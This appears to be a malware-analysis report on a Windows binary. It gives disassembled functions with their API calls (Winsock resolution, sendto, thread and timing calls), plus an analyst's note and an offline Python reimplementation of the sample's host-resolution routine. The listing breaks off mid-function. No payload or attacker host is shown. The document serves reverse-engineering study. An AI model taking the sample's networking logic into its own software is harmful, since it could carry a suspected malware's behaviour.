0041341B je 0041342Eh
0041341D mov eax, dword ptr [ebp-0Ch]
00413420 mov edx, dword ptr [eax]
00413422 mov eax, dword ptr [0042B3C0h] 00000000
00413428 call dword ptr [0042B3BCh]
0041342E push 0042C860h xrefs 0041341B
00413433 call 0040623Ch
00413438 xor eax, eax
0041343A push ebp
0041343B push 00413469h
00413440 push dword ptr fs:[eax]
00413443 mov dword ptr fs:[eax], esp
00413446 push FFFFFFFFh
00413448 mov eax, dword ptr [ebp-08h]
0041344B push eax
0041344C call 0040629Ch
00413451 xor eax, eax
00413453 pop edx
00413455 pop ecx Count = 2
00413456 mov dword ptr fs:[eax], edx
00413459 push 00413470h
0041345E push 0042C860h xrefs 0041346E
00413463 call 0040611Ch
00413468 ret function end
004134BE pop ebx xrefs 004133A6, 004134B5
004134BF mov esp, ebp
004134C1 pop ebp
004134C2 ret function end
APIs
  • CharNextA.USER32, ref: 00405353
Address Instruction Meta Information
00405350 jmp 00405358h xrefs 00405433, 004053E7, 004053FA
00405352 push eax xrefs 00405361
00405353 call 00401200h CharNextA@USER32.DLL (Import)
00405358 mov dl, byte ptr [eax] xrefs 00405350
0040535A test dl, dl
0040535C je 00405363h
0040535E cmp dl, 0000005Ch
00405361 jne 00405352h
00405363 ret xrefs 0040535C function end
APIs
  • inet_ntoa.WS2_32, ref: 00413F9C
  • getnameinfo.WS2_32, ref: 00413FF4
Address Instruction Meta Information
00413F58 push ebp xrefs 004181AA
00413F59 mov ebp, esp
00413F5B add esp, FFFFFFDCh
00413F5E push ebx
00413F5F push esi
00413F60 push edi
00413F61 xor ecx, ecx
00413F63 mov dword ptr [ebp-04h], ecx
00413F66 mov dword ptr [ebp-08h], ecx
00413F69 mov esi, eax
00413F6B lea edi, dword ptr [ebp-24h]
00413F6E mov ecx, 00000007h
00413F73 rep movsd
00413F75 mov edi, edx
00413F77 xor eax, eax
00413F79 push ebp
00413F7A push 0041402Ah
00413F7F push dword ptr fs:[eax]
00413F82 mov dword ptr fs:[eax], esp
00413F85 mov eax, edi
00413F87 call 004043DCh
00413F8C movzx eax, word ptr [ebp-24h]
00413F90 call 00413B74h
00413F95 test al, al
00413F97 jne 00413FB3h
00413F99 push dword ptr [ebp-20h]
00413F9C call dword ptr [0042B41Ch] inet_ntoa@WS2_32.DLL (Hidden Import)
00413FA2 mov ebx, eax
00413FA4 test ebx, ebx
00413FA6 je 0041400Fh
00413FA8 mov eax, edi
00413FAA mov edx, ebx
00413FAC call 004045D4h
00413FB1 jmp 0041400Fh
00413FB3 mov ebx, 00000401h xrefs 00413F97
00413FB8 mov esi, 00000020h
00413FBD lea eax, dword ptr [ebp-04h]
00413FC0 mov edx, ebx
00413FC2 call 004049A8h
00413FC7 lea eax, dword ptr [ebp-08h]
00413FCA mov edx, esi
00413FCC call 004049A8h
00413FD1 push 0000000Ah
00413FD3 push esi
00413FD4 mov eax, dword ptr [ebp-08h]
00413FD7 call 00404878h
00413FDC push eax
00413FDD push ebx
00413FDE mov eax, dword ptr [ebp-04h]
00413FE1 call 00404878h
00413FE6 push eax
00413FE7 lea eax, dword ptr [ebp-24h]
00413FEA call 0041399Ch
00413FEF push eax
00413FF0 lea eax, dword ptr [ebp-24h]
00413FF3 push eax
00413FF4 call dword ptr [0042B454h] getnameinfo@WS2_32.DLL (Hidden Import)
00413FFA test eax, eax
00413FFC jne 0041400Fh
00413FFE mov eax, dword ptr [ebp-04h]
00414001 call 00404878h
00414006 mov edx, eax
00414008 mov eax, edi
0041400A call 004045D4h
0041400F xor eax, eax xrefs 00413FFC, 00413FA6, 00413FB1
00414011 pop edx
00414013 pop ecx Count = 2
00414014 mov dword ptr fs:[eax], edx
00414017 push 00414031h
0041401C lea eax, dword ptr [ebp-08h] xrefs 0041402F
0041401F mov edx, 00000002h
00414024 call 00404400h
00414029 ret function end
Address Instruction Meta Information
004058F8 mov edx, dword ptr [eax] xrefs 0040383A, 00404DFF, 00413698, 004136C5
004058FA test edx, edx
004058FC je 0040590Ch
004058FE mov dword ptr [eax], 00000000h
00405904 push eax
00405905 push edx
00405906 mov eax, dword ptr [edx]
00405908 call dword ptr [eax+08h]
0040590B pop eax
0040590C ret xrefs 004058FC function end
APIs
  • MultiByteToWideChar.KERNEL32, ref: 0040452E
Address Instruction Meta Information
0040451C push ebp xrefs 00404B31, 00404B03
0040451D mov ebp, esp
0040451F push edx
00404520 push eax
00404521 mov eax, dword ptr [ebp+08h]
00404524 push eax
00404525 push ecx
00404526 push 00000000h
00404528 mov eax, dword ptr [0042C5B8h] 00000003
0040452D push eax
0040452E call 004012A0h MultiByteToWideChar@KERNEL32.DLL (Hidden Import)
00404533 pop ebp
00404534 retn 0004h function end
APIs
  • sendto.WS2_32, ref: 00413B3A
Address Instruction Meta Information
00413B08 push ebp xrefs 00419CA2
00413B09 mov ebp, esp
00413B0B add esp, FFFFFFE4h
00413B0E push ebx
00413B0F push esi
00413B10 push edi
00413B11 mov esi, dword ptr [ebp+08h]
00413B14 lea edi, dword ptr [ebp-1Ch]
00413B17 push ecx
00413B18 mov ecx, 00000007h
00413B1D rep movsd
00413B1F pop ecx
00413B20 mov edi, ecx
00413B22 mov esi, edx
00413B24 mov ebx, eax
00413B26 lea eax, dword ptr [ebp-1Ch]
00413B29 call 0041399Ch
00413B2E push eax
00413B2F lea eax, dword ptr [ebp-1Ch]
00413B32 push eax
00413B33 mov eax, dword ptr [ebp+0Ch]
00413B36 push eax
00413B37 push edi
00413B38 push esi
00413B39 push ebx
00413B3A call dword ptr [0042B3FCh] sendto@WS2_32.DLL (Hidden Import)
00413B40 pop edi
00413B41 pop esi
00413B42 pop ebx
00413B43 mov esp, ebp
00413B45 pop ebp
00413B46 retn 0008h function end
APIs
  • GetLocalTime.KERNEL32, ref: 00408C10
Address Instruction Meta Information
00408C0C add esp, FFFFFFF0h xrefs 00409A80, 00409CAB, 00409C70
00408C0F push esp
00408C10 call 004061B4h GetLocalTime@KERNEL32.DLL (Hidden Import)
00408C15 mov ax, word ptr [esp]
00408C19 add esp, 10h
00408C1C ret function end
APIs
  • ResumeThread.KERNEL32, ref: 004134F4
Address Instruction Meta Information
004134EC push ebx xrefs 00422544, 0041327A, 004132C2
004134ED push esi
004134EE mov ebx, eax
004134F0 mov eax, dword ptr [ebx+04h]
004134F3 push eax
004134F4 call 0040626Ch ResumeThread@KERNEL32.DLL (Hidden Import)
004134F9 mov esi, eax
004134FB test esi, esi
004134FD setnl dl
00413500 mov eax, ebx
00413502 call 00413344h
00413507 dec esi
00413508 jne 0041350Eh
0041350A mov byte ptr [ebx+0Eh], 00000000h
0041350E pop esi xrefs 00413508
0041350F pop ebx
00413510 ret function end
APIs
  • CharNextA.USER32, ref: 0040B38D
Address Instruction Meta Information
0040B380 push ebx xrefs 0040B413, 00409056, 0040B3D9
0040B381 mov ebx, eax
0040B383 cmp byte ptr [0042C744h], 00000000h
0040B38A je 0040B396h
0040B38C push ebx
0040B38D call 004062ACh CharNextA@USER32.DLL (Import)
0040B392 sub eax, ebx
0040B394 pop ebx
0040B395 ret function end
0040B396 mov eax, 00000001h xrefs 0040B38A
0040B39B pop ebx
0040B39C ret function end
APIs
  • FreeLibrary.KERNEL32, ref: 00414CF4
Address Instruction Meta Information
00414C90 push ebp xrefs 0041C80A
00414C91 mov ebp, esp
00414C93 mov eax, dword ptr [0042C8A4h] 00960A4C
00414C98 call 00413914h
00414C9D xor eax, eax
00414C9F push ebp
00414CA0 push 00414D18h
00414CA5 push dword ptr fs:[eax]
00414CA8 mov dword ptr fs:[eax], esp
00414CAB dec dword ptr [0042B460h]
00414CB1 cmp dword ptr [0042B460h], 00000000h
00414CB8 jnl 00414CC1h
00414CBA xor eax, eax
00414CBC mov dword ptr [0042B460h], eax
00414CC1 cmp dword ptr [0042B460h], 00000000h xrefs 00414CB8
00414CC8 jne 00414D00h
00414CCA cmp dword ptr [0042B464h], 00000000h
00414CD1 je 00414CE5h
00414CD3 mov eax, dword ptr [0042B464h] 00000000
00414CD8 push eax
00414CD9 call 00406154h
00414CDE xor eax, eax
00414CE0 mov dword ptr [0042B464h], eax
00414CE5 cmp dword ptr [0042B468h], 00000000h xrefs 00414CD1
00414CEC je 00414D00h
00414CEE mov eax, dword ptr [0042B468h] 00000000
00414CF3 push eax
00414CF4 call 00406154h FreeLibrary@KERNEL32.DLL (Hidden Import)
00414CF9 xor eax, eax
00414CFB mov dword ptr [0042B468h], eax
00414D00 xor eax, eax xrefs 00414CC8, 00414CEC
00414D02 pop edx
00414D04 pop ecx Count = 2
00414D05 mov dword ptr fs:[eax], edx
00414D08 push 00414D1Fh
00414D0D mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00414D1D
00414D12 call 0041391Ch
00414D17 ret function end
APIs
  • getsockname.WS2_32, ref: 00413A2D
Address Instruction Meta Information
00413A10 push ebx xrefs 004185C5
00413A11 push esi
00413A12 push ecx
00413A13 mov ebx, edx
00413A15 mov esi, eax
00413A17 mov dword ptr [esp], 0000001Ch
00413A1E mov eax, ebx
00413A20 xor ecx, ecx
00413A22 mov edx, dword ptr [esp]
00413A25 call 00403030h
00413A2A push esp
00413A2B push ebx
00413A2C push esi
00413A2D call dword ptr [0042B42Ch] getsockname@WS2_32.DLL (Hidden Import)
00413A33 pop edx
00413A34 pop esi
00413A35 pop ebx
00413A36 ret function end
APIs
  • LocalAlloc.KERNEL32, ref: 00405F97
Address Instruction Meta Information
00405F94 push eax xrefs 00405FC9
00405F95 push 00000040h
00405F97 call 00405F7Ch LocalAlloc@KERNEL32.DLL (Hidden Import)
00405F9C ret function end
APIs
    • LocalAlloc.KERNEL32, ref: 00405F97
  • TlsSetValue.KERNEL32, ref: 00405FE5
Address Instruction Meta Information
00405FA8 push ebx xrefs 00406006
00405FA9 call 00405FA0h
00405FAE mov ebx, eax
00405FB0 test ebx, ebx
00405FB2 je 00405FEAh
00405FB4 cmp dword ptr [0042B0C4h], FFFFFFFFh
00405FBB jne 00405FC7h
00405FBD mov eax, 000000E2h
00405FC2 call 0040434Ch
00405FC7 mov eax, ebx xrefs 00405FBB
00405FC9 call 00405F94h
00405FCE test eax, eax
00405FD0 jne 00405FDEh
00405FD2 mov eax, 000000E2h
00405FD7 call 0040434Ch
00405FDC jmp 00405FEAh
00405FDE push eax xrefs 00405FD0
00405FDF mov eax, dword ptr [0042B0C4h] 00000000
00405FE4 push eax
00405FE5 call 00405F8Ch TlsSetValue@KERNEL32.DLL (Hidden Import)
00405FEA pop ebx xrefs 00405FB2, 00405FDC
00405FEB ret function end
APIs
    • GetACP.KERNEL32, ref: 0040B59F
  • GetCPInfo.KERNEL32, ref: 0040B5ED
Address Instruction Meta Information
0040B5D4 push ebp xrefs 0040B791, 0040B6DF
0040B5D5 mov ebp, esp
0040B5D7 push ecx
0040B5D8 push ebx
0040B5D9 push esi
0040B5DA push edi
0040B5DB mov edi, dword ptr [ebp+08h]
0040B5DE add edi, FFFFFFECh
0040B5E1 push edi
0040B5E2 mov eax, dword ptr [0042C738h] 00000409
0040B5E7 call 0040B560h
0040B5EC push eax
0040B5ED call 0040617Ch GetCPInfo@KERNEL32.DLL (Hidden Import)
0040B5F2 xor esi, esi
0040B5F4 jmp 0040B61Fh
0040B5F6 mov al, byte ptr [edi+esi+06h] xrefs 0040B62C
0040B5FA mov bl, byte ptr [edi+esi+07h]
0040B5FE sub bl, al
0040B600 jc 0040B61Ch
0040B602 inc ebx
0040B603 mov byte ptr [ebp-01h], al
0040B606 mov al, byte ptr [ebp-01h] xrefs 0040B61A
0040B609 and eax, 000000FFh
0040B60E bts dword ptr [0042B130h], eax
0040B615 inc byte ptr [ebp-01h]
0040B618 dec bl
0040B61A jne 0040B606h
0040B61C add esi, 02h xrefs 0040B600
0040B61F cmp esi, 0Ch xrefs 0040B5F4
0040B622 jnl 0040B62Eh
0040B624 mov al, byte ptr [edi+esi+06h]
0040B628 or al, byte ptr [edi+esi+07h]
0040B62C jne 0040B5F6h
0040B62E pop edi xrefs 0040B622
0040B62F pop esi
0040B630 pop ebx
0040B631 pop ecx
0040B632 pop ebp
0040B633 ret function end
APIs
  • GetVersionExA.KERNEL32, ref: 0040B096
Address Instruction Meta Information
0040B088 add esp, FFFFFF6Ch xrefs 0040C52B
0040B08E mov dword ptr [esp], 00000094h
0040B095 push esp
0040B096 call 004061FCh GetVersionExA@KERNEL32.DLL (Hidden Import)
0040B09B test eax, eax
0040B09D je 0040B0EFh
0040B09F mov eax, dword ptr [esp+10h]
0040B0A3 mov dword ptr [0042B0E8h], eax
0040B0A8 mov eax, dword ptr [esp+04h]
0040B0AC mov dword ptr [0042B0ECh], eax
0040B0B1 mov eax, dword ptr [esp+08h]
0040B0B5 mov dword ptr [0042B0F0h], eax
0040B0BA cmp dword ptr [0042B0E8h], 01h
0040B0C1 jne 0040B0D3h
0040B0C3 mov eax, dword ptr [esp+0Ch]
0040B0C7 and eax, 0000FFFFh
0040B0CC mov dword ptr [0042B0F4h], eax
0040B0D1 jmp 0040B0DCh
0040B0D3 mov eax, dword ptr [esp+0Ch] xrefs 0040B0C1
0040B0D7 mov dword ptr [0042B0F4h], eax
0040B0DC mov eax, 0042B0F8h xrefs 0040B0D1
0040B0E1 lea edx, dword ptr [esp+14h]
0040B0E5 mov ecx, 00000080h
0040B0EA call 0040464Ch
0040B0EF add esp, 00000094h xrefs 0040B09D
0040B0F5 ret function end
APIs
  • inet_addr.WS2_32, ref: 004140CB
  • gethostbyname.WS2_32, ref: 004140F1
  • getaddrinfo.WS2_32, ref: 004141D7
  • getnameinfo.WS2_32, ref: 00414245
  • FreeAddrInfoW.WS2_32, ref: 0041428E
Strings
  • 0.0.0.0, va: 0041430C
  • %d.%d.%d.%d, va: 004142F8
Address Instruction Meta Information
00414078 push ebp xrefs 00419808
00414079 mov ebp, esp
0041407B add esp, FFFFFFA4h
0041407E push ebx
0041407F push esi
00414080 push edi
00414081 xor ebx, ebx
00414083 mov dword ptr [ebp-0Ch], ebx
00414086 mov dword ptr [ebp-10h], ebx
00414089 mov dword ptr [ebp-18h], ebx
0041408C mov ebx, ecx
0041408E mov esi, edx
00414090 mov dword ptr [ebp-04h], eax
00414093 mov eax, dword ptr [ebp-04h]
00414096 call 00404868h
0041409B xor eax, eax
0041409D push ebp
0041409E push 004142E0h
004140A3 push dword ptr fs:[eax]
004140A6 mov dword ptr fs:[eax], esp
004140A9 mov eax, dword ptr [ebp+08h]
004140AC mov edx, dword ptr [eax]
004140AE call dword ptr [edx+44h]
004140B1 mov eax, esi
004140B3 call 00413B74h
004140B8 test al, al
004140BA jne 0041418Fh
004140C0 mov eax, dword ptr [ebp-04h]
004140C3 call 00404878h
004140C8 mov ebx, eax
004140CA push ebx
004140CB call dword ptr [0042B420h] inet_addr@WS2_32.DLL (Hidden Import)
004140D1 inc eax
004140D2 jne 0041417Fh
004140D8 mov eax, dword ptr [0042C8A4h] 00960A4C
004140DD call 00413914h
004140E2 xor edx, edx
004140E4 push ebp
004140E5 push 00414178h
004140EA push dword ptr fs:[edx]
004140ED mov dword ptr fs:[edx], esp
004140F0 push ebx
004140F1 call dword ptr [0042B3E4h] gethostbyname@WS2_32.DLL (Hidden Import)
004140F7 test eax, eax
004140F9 je 00414160h
004140FB mov esi, dword ptr [eax+0Ch]
004140FE xor ebx, ebx
00414100 jmp 00414159h
00414102 mov eax, dword ptr [eax] xrefs 0041415E
00414104 mov dword ptr [ebp-1Ch], eax
00414107 lea eax, dword ptr [ebp-18h]
0041410A push eax
0041410B xor eax, eax
0041410D mov al, byte ptr [ebp-1Ch]
00414110 mov dword ptr [ebp-5Ch], eax
00414113 mov byte ptr [ebp-58h], 00000000h
00414117 xor eax, eax
00414119 mov al, byte ptr [ebp-1Bh]
0041411C mov dword ptr [ebp-54h], eax
0041411F mov byte ptr [ebp-50h], 00000000h
00414123 xor eax, eax
00414125 mov al, byte ptr [ebp-1Ah]
00414128 mov dword ptr [ebp-4Ch], eax
0041412B mov byte ptr [ebp-48h], 00000000h
0041412F xor eax, eax
00414131 mov al, byte ptr [ebp-19h]
00414134 mov dword ptr [ebp-44h], eax
00414137 mov byte ptr [ebp-40h], 00000000h
0041413B lea edx, dword ptr [ebp-5Ch]
0041413E mov ecx, 00000003h
00414143 mov eax, 004142F8h ASCII "%d.%d.%d.%d"
00414148 call 00408048h
0041414D mov edx, dword ptr [ebp-18h]
00414150 mov eax, dword ptr [ebp+08h]
00414153 mov ecx, dword ptr [eax]
00414155 call dword ptr [ecx+38h]
00414158 inc ebx
00414159 mov eax, dword ptr [esi+ebx*4] xrefs 00414100
0041415C test eax, eax
0041415E jne 00414102h
00414160 xor eax, eax xrefs 004140F9
00414162 pop edx
00414164 pop ecx Count = 2
00414165 mov dword ptr fs:[eax], edx
00414168 push 0041429Ch
0041416D mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 0041417D
00414172 call 0041391Ch
00414177 ret function end
0041417F mov edx, dword ptr [ebp-04h] xrefs 004140D2
00414182 mov eax, dword ptr [ebp+08h]
00414185 mov ecx, dword ptr [eax]
00414187 call dword ptr [ecx+38h]
0041418A jmp 0041429Ch
0041418F xor eax, eax xrefs 004140BA
00414191 mov dword ptr [ebp-08h], eax
00414194 xor edx, edx
00414196 push ebp
00414197 push 00414295h
0041419C push dword ptr fs:[edx]
0041419F mov dword ptr fs:[edx], esp
004141A2 lea eax, dword ptr [ebp-3Ch]
004141A5 xor ecx, ecx
004141A7 mov edx, 00000020h
004141AC call 00403030h
004141B1 xor eax, eax
004141B3 mov dword ptr [ebp-38h], eax
004141B6 mov eax, dword ptr [ebp+0Ch]
004141B9 mov dword ptr [ebp-34h], eax
004141BC mov dword ptr [ebp-30h], ebx
004141BF xor eax, eax
004141C1 mov dword ptr [ebp-3Ch], eax
004141C4 lea eax, dword ptr [ebp-08h]
004141C7 push eax
004141C8 lea eax, dword ptr [ebp-3Ch]
004141CB push eax
004141CC push 00000000h
004141CE mov eax, dword ptr [ebp-04h]
004141D1 call 00404878h
004141D6 push eax
004141D7 call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
004141DD test eax, eax
004141DF jne 00414277h
004141E5 mov ebx, dword ptr [ebp-08h]
004141E8 jmp 0041426Fh
004141ED cmp esi, 17h xrefs 00414271
004141F0 jne 004141F8h
004141F2 cmp dword ptr [ebx+04h], 02h
004141F6 je 0041426Ch
004141F8 cmp esi, 02h xrefs 004141F0
004141FB jne 00414203h
004141FD cmp dword ptr [ebx+04h], 17h
00414201 je 0041426Ch
00414203 mov edi, 00000401h xrefs 004141FB
00414208 mov dword ptr [ebp-14h], 00000020h
0041420F lea eax, dword ptr [ebp-0Ch]
00414212 mov edx, edi
00414214 call 004049A8h
00414219 lea eax, dword ptr [ebp-10h]
0041421C mov edx, dword ptr [ebp-14h]
0041421F call 004049A8h
00414224 push 0000000Ah
00414226 mov eax, dword ptr [ebp-14h]
00414229 push eax
0041422A mov eax, dword ptr [ebp-10h]
0041422D call 00404878h
00414232 push eax
00414233 push edi
00414234 mov eax, dword ptr [ebp-0Ch]
00414237 call 00404878h
0041423C push eax
0041423D mov eax, dword ptr [ebx+10h]
00414240 push eax
00414241 mov eax, dword ptr [ebx+18h]
00414244 push eax
00414245 call dword ptr [0042B454h] getnameinfo@WS2_32.DLL (Hidden Import)
0041424B test eax, eax
0041424D jne 0041426Ch
0041424F mov eax, dword ptr [ebp-0Ch]
00414252 call 00404878h
00414257 mov edx, eax
00414259 lea eax, dword ptr [ebp-0Ch]
0041425C call 004045D4h
00414261 mov edx, dword ptr [ebp-0Ch]
00414264 mov eax, dword ptr [ebp+08h]
00414267 mov ecx, dword ptr [eax]
00414269 call dword ptr [ecx+38h]
0041426C mov ebx, dword ptr [ebx+1Ch] xrefs 0041424D, 00414201, 004141F6
0041426F test ebx, ebx xrefs 004141E8
00414271 jne 004141EDh
00414277 xor eax, eax xrefs 004141DF
00414279 pop edx
0041427B pop ecx Count = 2
0041427C mov dword ptr fs:[eax], edx
0041427F push 0041429Ch
00414284 cmp dword ptr [ebp-08h], 00000000h xrefs 0041429A
00414288 je 00414294h
0041428A mov eax, dword ptr [ebp-08h]
0041428D push eax
0041428E call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00414294 ret xrefs 00414288 function end
0041429C mov eax, dword ptr [ebp+08h] xrefs 0041418A
0041429F mov edx, dword ptr [eax]
004142A1 call dword ptr [edx+14h]
004142A4 test eax, eax
004142A6 jne 004142B5h
004142A8 mov edx, 0041430Ch ASCII "0.0.0.0"
004142AD mov eax, dword ptr [ebp+08h]
004142B0 mov ecx, dword ptr [eax]
004142B2 call dword ptr [ecx+38h]
004142B5 xor eax, eax xrefs 004142A6
004142B7 pop edx
004142B9 pop ecx Count = 2
004142BA mov dword ptr fs:[eax], edx
004142BD push 004142E7h
004142C2 lea eax, dword ptr [ebp-18h] xrefs 004142E5
004142C5 call 004043DCh
004142CA lea eax, dword ptr [ebp-10h]
004142CD mov edx, 00000002h
004142D2 call 00404400h
004142D7 lea eax, dword ptr [ebp-04h]
004142DA call 004043DCh
004142DF ret function end
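The routine at 00414078 above resolves a host string along two paths. On the first, inet_addr is tried and the `inc eax / jne` at 004140D1 checks for INADDR_NONE; a literal is added as-is, anything else goes to gethostbyname and every h_addr_list entry is rendered through the "%d.%d.%d.%d" string at 004142F8. On the second, a zeroed 32-byte hints block at [ebp-3Ch] with ai_family = AF_UNSPEC is passed to getaddrinfo, the result chain is walked with the offsets +04h (ai_family), +10h (ai_addrlen), +18h (ai_addr) and +1Ch (ai_next) of the 32-bit Winsock addrinfo layout, entries of the other family are skipped (02h = AF_INET, 17h = AF_INET6), and each remaining address is rendered with getnameinfo using flags 0Ah (NI_NUMERICHOST | NI_NUMERICSERV) and the NI_MAXHOST (401h) / NI_MAXSERV (20h) buffer sizes. Whichever path runs, the string "0.0.0.0" at 0041430C is added when the output is still empty. The Python below is an added reimplementation of that control flow, not code from the sample or from the report; the ws2_32 calls are injected so it runs offline on constructed data, the outcome of the test at 00413B74 is passed in as `use_getaddrinfo` because its condition is not visible in this listing, and treating the virtual slots at +44h/+38h/+14h as Clear/Add/Count of a string-list object is an inference from how they are used.

```python
import socket
import struct

# Winsock constants as they appear in the listing: 02h/17h family compares,
# 0Ah getnameinfo flags, 401h/20h buffer sizes.
AF_UNSPEC, AF_INET, AF_INET6 = 0, 2, 23
NI_NUMERICHOST, NI_NUMERICSERV = 0x2, 0x8
NI_MAXHOST, NI_MAXSERV = 1025, 32
INADDR_NONE = 0xFFFFFFFF


def inet_addr(text):
    """Winsock inet_addr semantics: dotted quad -> 32-bit value, INADDR_NONE on parse failure."""
    try:
        return struct.unpack("!I", socket.inet_aton(text))[0]
    except OSError:
        return INADDR_NONE


def resolve_host(host, family, socktype, proto, stack, use_getaddrinfo):
    """Emulates the routine at 00414078 and returns the strings it would add to its output list.
    `stack` stands in for ws2_32 (see FakeStack); `use_getaddrinfo` is the outcome of the
    test at 00413B74, whose condition is not visible in the listing (assumption)."""
    out = []                                                   # [edx+44h]: assumed Clear
    if not use_getaddrinfo:
        if inet_addr(host) != INADDR_NONE:                     # 004140D1: inc eax / jne
            out.append(host)                                   # literal is added unchanged
        else:
            entry = stack.gethostbyname(host)                  # 004140F1
            for addr in entry or []:                           # h_addr_list walk 00414102..0041415E
                out.append("%d.%d.%d.%d" % tuple(addr))        # format string at 004142F8
    else:
        hints = dict(ai_flags=0, ai_family=AF_UNSPEC,          # 32-byte hints block at [ebp-3Ch]
                     ai_socktype=socktype, ai_protocol=proto)
        for ai_family, ai_addr in stack.getaddrinfo(host, hints):
            if family == AF_INET6 and ai_family == AF_INET:    # 004141ED..004141F6
                continue
            if family == AF_INET and ai_family == AF_INET6:    # 004141F8..00414201
                continue
            text = stack.getnameinfo(ai_addr, NI_NUMERICHOST | NI_NUMERICSERV)
            if text is not None:                               # getnameinfo returned 0
                out.append(text)
        # the FreeAddrInfo cleanup in the finally block at 00414284 has no equivalent here
    if not out:                                                # [edx+14h]: assumed Count == 0
        out.append("0.0.0.0")                                  # string at 0041430C
    return out


class FakeStack:
    """Offline stand-in for the ws2_32 calls; answers come from a constructed table,
    not from DNS.  Table entries are (family, raw address bytes)."""
    def __init__(self, table):
        self.table = table

    def gethostbyname(self, host):        # IPv4 only, like the real call
        return [a for fam, a in self.table.get(host, []) if fam == AF_INET] or None

    def getaddrinfo(self, host, hints):   # AF_UNSPEC hint: every family comes back
        return list(self.table.get(host, []))

    def getnameinfo(self, addr, flags):   # numeric flags: just render the address
        assert flags == NI_NUMERICHOST | NI_NUMERICSERV
        return socket.inet_ntop(socket.AF_INET6 if len(addr) == 16 else socket.AF_INET, bytes(addr))


# Constructed test data; "host.example" is a made-up name, not one from the sample.
SAMPLE_STACK = FakeStack({
    "host.example": [(AF_INET, b"\xc0\xa8\x01\x0a"),
                     (AF_INET6, b"\x20\x01" + b"\x00" * 13 + b"\x01")],
})

if __name__ == "__main__":
    for host, fam, gai in [("10.0.0.5", AF_INET, False), ("host.example", AF_INET, False),
                           ("host.example", AF_INET6, True), ("255.255.255.255", AF_INET, False),
                           ("nosuch.example", AF_INET6, True)]:
        print(host, fam, resolve_host(host, fam, 1, 6, SAMPLE_STACK, gai))
```

Two properties of the original worth keeping in mind when reading the sample's traffic: a name that resolves nowhere still yields "0.0.0.0", so a later connect to 0.0.0.0 is a resolution failure rather than a configured target; and because inet_addr signals failure with INADDR_NONE, which is also the encoding of 255.255.255.255, that one literal is never added directly but sent down the gethostbyname path.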
APIs
    • QueryPerformanceCounter.KERNEL32, ref: 00402A20
    • GetTickCount.KERNEL32, ref: 00402A34
  • Sleep.KERNEL32, ref: 0042975A
Address Instruction Meta Information
004291FC push ebp
004291FD mov ebp, esp
004291FF mov ecx, 0000000Eh
00429206 push 00000000h Count = 2
00429208 dec ecx
00429209 jne 00429204h
0042920B push ecx
0042920C push ebx
0042920D push esi
0042920E push edi
0042920F xor edx, edx
00429211 push ebp
00429212 push 00429798h
00429217 push dword ptr fs:[edx]
0042921A mov dword ptr fs:[edx], esp
0042921D mov byte ptr [eax+0Fh], 00000001h
00429221 mov dl, 01h
00429223 mov eax, dword ptr [0040FD08h] 0040FD54
00429228 call 004036D8h
0042922D mov dword ptr [0042DA80h], eax
00429232 mov dword ptr [ebp-0Ch], 000000B4h
00429239 mov eax, dword ptr [ebp-0Ch]
0042923C mov dword ptr [ebp-08h], eax
0042923F xor eax, eax
00429241 mov dword ptr [0042DA6Ch], eax
00429246 xor eax, eax
00429248 mov dword ptr [0042DA90h], eax
0042924D xor eax, eax
0042924F mov dword ptr [0042DA94h], eax
00429254 xor eax, eax
00429256 mov dword ptr [0042DA98h], eax
0042925B call 00402A1Ch
00429260 xor eax, eax xrefs 0042975F
00429262 push ebp
00429263 push 00429748h
00429268 push dword ptr fs:[eax]
0042926B mov dword ptr fs:[eax], esp
0042926E mov dl, 01h
00429270 mov eax, dword ptr [0040FD08h] 0040FD54
00429275 call 004036D8h
0042927A mov dword ptr [ebp-04h], eax
0042927D lea edx, dword ptr [ebp-1Ch]
00429280 mov eax, dword ptr [0042DA88h] 00000000
00429285 call 00429030h
0042928A mov edx, dword ptr [ebp-1Ch]
0042928D mov eax, dword ptr [ebp-04h]
00429290 mov ecx, dword ptr [eax]
00429292 call dword ptr [ecx+2Ch]
00429295 lea edx, dword ptr [ebp-20h]
00429298 mov eax, dword ptr [ebp-04h]
0042929B mov ecx, dword ptr [eax]
0042929D call dword ptr [ecx+1Ch]
004292A0 mov edx, dword ptr [ebp-20h]
004292A3 mov eax, 004297B0h
004292A8 call 00404960h
004292AD cmp eax, 03h
004292B0 jne 00429724h
004292B6 xor eax, eax
004292B8 push ebp
004292B9 push 004292F9h
004292BE push dword ptr fs:[eax]
004292C1 mov dword ptr fs:[eax], esp
004292C4 lea eax, dword ptr [ebp-24h]
004292C7 push eax
004292C8 lea edx, dword ptr [ebp-28h]
004292CB mov eax, dword ptr [ebp-04h]
004292CE mov ecx, dword ptr [eax]
004292D0 call dword ptr [ecx+1Ch]
004292D3 mov eax, dword ptr [ebp-28h]
004292D6 mov ecx, 00000001h
004292DB xor edx, edx
004292DD call 004048D8h
004292E2 mov eax, dword ptr [ebp-24h]
004292E5 call 00422574h
004292EA mov dword ptr [0042DA68h], eax
004292EF xor eax, eax
004292F1 pop edx
004292F3 pop ecx Count = 2
004292F4 mov dword ptr fs:[eax], edx
004292F7 jmp 00429303h
00429303 xor eax, eax xrefs 004292F7
00429305 push ebp
00429306 push 00429349h
0042930B push dword ptr fs:[eax]
0042930E mov dword ptr fs:[eax], esp
00429311 lea eax, dword ptr [ebp-2Ch]
00429314 push eax
00429315 lea edx, dword ptr [ebp-30h]
00429318 mov eax, dword ptr [ebp-04h]
0042931B mov ecx, dword ptr [eax]
0042931D call dword ptr [ecx+1Ch]
00429320 mov eax, dword ptr [ebp-30h]
00429323 mov ecx, 00000001h
00429328 mov edx, 00000002h
0042932D call 004048D8h
00429332 mov eax, dword ptr [ebp-2Ch]
00429335 call 00422574h
0042933A mov dword ptr [0042DA8Ch], eax
0042933F xor eax, eax
00429341 pop edx
00429343 pop ecx Count = 2
00429344 mov dword ptr fs:[eax], edx
00429347 jmp 0042935Dh
0042935D lea eax, dword ptr [ebp-34h] xrefs 00429347
00429360 push eax
00429361 lea edx, dword ptr [ebp-38h]
00429364 mov eax, dword ptr [ebp-04h]
00429367 mov ecx, dword ptr [eax]
00429369 call dword ptr [ecx+1Ch]
0042936C mov eax, dword ptr [ebp-38h]
0042936F call 00404678h
00429374 sub eax, 04h
00429377 push eax
00429378 lea edx, dword ptr [ebp-3Ch]
0042937B mov eax, dword ptr [ebp-04h]
0042937E mov ecx, dword ptr [eax]
